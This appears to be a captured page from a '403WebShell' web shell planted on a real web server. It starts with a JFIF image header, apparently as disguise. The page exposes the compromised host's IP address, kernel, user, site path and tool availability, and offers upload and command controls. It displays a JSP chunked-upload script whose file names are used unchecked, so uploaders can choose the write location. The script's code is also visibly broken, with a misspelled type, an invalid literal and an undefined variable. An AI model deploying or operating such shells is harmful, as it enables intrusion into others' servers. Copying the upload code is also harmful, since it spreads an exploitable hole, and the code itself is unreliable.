????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.48
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/icad.astacus.se/customerzon/JavaPowUpload/FileProcessingScripts/JSP/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/icad.astacus.se/customerzon/JavaPowUpload/FileProcessingScripts/JSP//chunkedupload.jsp
  <%--
	This script's using Apache Commons Fileupload library (which require Apache Commons IO)
	to parse request, they can be downloaded from:
	commons-io: http://commons.apache.org/downloads/download_io.cgi
	commons-fileupload: http://commons.apache.org/downloads/download_fileupload.cgi
	
	See documentation of your web server to get an information about where you should place this libraries. 
	Ex. TomCat:
	"For classes and resources specific to a particular web application, place unpacked classes and resources
	under /WEB-INF/classes of your web application archive, or place JAR files containing those classes and resources
	under /WEB-INF/lib of your web application archive."
	--%>

  <%--
	Include required libraries and java classes:
  --%>
  <%@ page import="org.apache.commons.fileupload.servlet.ServletFileUpload" %>
  <%@ page import="org.apache.commons.fileupload.FileItem" %>
  <%@ page import="org.apache.commons.fileupload.disk.DiskFileItemFactory" %>
  <%@ page import="java.util.List" %>
  <%@ page import="java.io.File" %>

  <%@ page import="java.io.InputStream" %>  
  <%@ page import="java.net.URLDecoder" %>
  <%@ page import="java.io.FileOutputStream" %>
  <%@ page import="java.io.FileInputStream" %>
  <%
	final String openTag = "<javapowupload>";
	final String closeTag = "</javapowupload>";
	
	
  
  	String tmp = null;
  	tmp = request.getParameter("action");
	boolean querySize = tmp == null ? false : tmp.equals("check");
	boolean upload = tmp == null ? false : tmp.equals("upload");
	
	
	tmp = null;
	tmp = request.getParameter("isMultiPart");	
	boolean isMultiPart = tmp == null ? false : Boolean.parseBoolean(tmp);
		
	tmp = null;
	tmp = request.getParameter("totalSize");
	Long fileSize = tmp == null ? 0L : Long.parseLong(tmp);
		
	String uniqueID = request.getParameter("fid");
		
	String comment = request.getParameter("Comment");
	if (comment != null)
		comment = URLDecoder.decode(comment,"8859_1");
		
	String tag = request.getParameter("Tag");
	if (tag != null)
		tag = URLDecoder.decode(tag,"8859_1");
		
		
	String fileName = request.getParameter("fileName");
	if (fileName == null || fileName.length() == 0)
		return;
	fileName = URLDecoder.decode(fileName,"8859_1");
		
	String tmpDir = System.getProperty("java.io.tmpdir");
	//Set your destination directory in variable below
	Sting destinationDir = '';
	String tmpFile = tmpDir + "\\" + uniqueID + fileName;
	File f = new File(tmpFile); 

  	out.println(openTag);
  	
	InputStream ips = null;
	
	if (querySize) {
		// assume we don't resume uploads, ie every upload loads a new file
		if (!f.exists())
			out.println("<ok size='0'/>");
		else
			out.println("<ok size='" + Long.toString(f.length()) + "'/>");
		
	} else if (upload) {
		if (isMultiPart)
			out.println("<error message=\"Multipart chunked upload is not supported at the moment\" />");
		else {
			
			// open the temp file for writing (appending if already exists)
			boolean append = f.exists();
			FileOutputStream fos = new FileOutputStream(f, append);

			ips = request.getInputStream();

			// write the content of the inputstream into the file
	        byte[] buffer = new byte[40960];
	        int bytesRead;
	        while ((bytesRead = ips.read(buffer)) != -1)
	        	fos.write(buffer, 0, bytesRead);
	        
	        fos.flush();
	        fos.close();
	        
	        f = new File(tmpFile);
			
			// check if the file is already complete. If so, rename temp file
	        if (f.exists() && f.length() >= fileSize) {
			
			FileInputStream streamIn = new FileInputStream(f);
			
			streamIn.close();
			
			if (result.indexOf("error") != -1) {
				out.println(new StringBuilder("<error message=\"Transfer error during transfer to back-end server: ")
					.append(result)
					.append("\"/>").toString());
			} else {
				// delete the tmpFile				
				f.renameTo(new File( destinationDir + "\\"+ fileName));		
				out.println("<response>File " + fileName + " was successfully uploaded.</response>");
			}
		}
			out.println("<ok/>");
		}
	} else {
		out.println("<error message=\"Invalid request\"/>");
	}
  	out.println(closeTag);
  	out.flush();	
  	
  %>

Youez - 2016 - github.com/yon3zu
LinuXploit